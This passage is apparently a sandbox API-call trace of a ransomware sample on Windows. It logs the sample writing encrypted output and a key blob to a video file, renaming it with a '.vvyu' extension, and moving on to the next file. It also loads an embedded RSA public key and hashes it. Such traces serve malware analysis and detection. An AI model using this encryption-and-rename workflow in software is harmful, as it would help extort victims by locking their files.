dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae60e0 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.018] GetCurrentThreadId () returned 0x5d8 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae6eb8 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.019] GetCurrentThreadId () returned 0x5d8 [0192.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0192.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0192.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0192.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0192.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0192.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0192.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a08 | out: hHeap=0x2c0000) returned 1 [0192.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0192.031] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x10f34, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x10f34, lpOverlapped=0x0) returned 1 [0192.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.032] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10f39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.032] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0192.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0192.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.034] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0192.034] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.034] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.034] CloseHandle (hObject=0x584) returned 1 [0192.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0192.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0192.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.037] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\iqB1Fd.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\iqb1fd.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\iqB1Fd.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\iqb1fd.mkv.vvyu")) returned 1 [0192.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.039] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.042] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab69e4d0, ftCreationTime.dwHighDateTime=0x1d89e6c, ftLastAccessTime.dwLowDateTime=0x763b1c50, ftLastAccessTime.dwHighDateTime=0x1d8a184, ftLastWriteTime.dwLowDateTime=0x763b1c50, ftLastWriteTime.dwHighDateTime=0x1d8a184, nFileSizeHigh=0x0, nFileSizeLow=0x5f92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="onXJrQ0LQmJjW.avi", cAlternateFileName="ONXJRQ~1.AVI")) returned 1 [0192.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a08 [0192.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0192.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a08 | out: hHeap=0x2c0000) returned 1 [0192.043] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\onXJrQ0LQmJjW.avi") returned=".avi" [0192.043] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\onXJrQ0LQmJjW.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\onxjrq0lqmjjw.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.043] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=24466) returned 1 [0192.043] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.047] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.047] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.050] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.050] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x5f92, lpOverlapped=0x0) returned 1 [0192.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.051] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.053] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.053] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.053] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.053] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.053] GetLastError () returned 0x0 [0192.053] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.053] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.054] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.054] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.054] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: 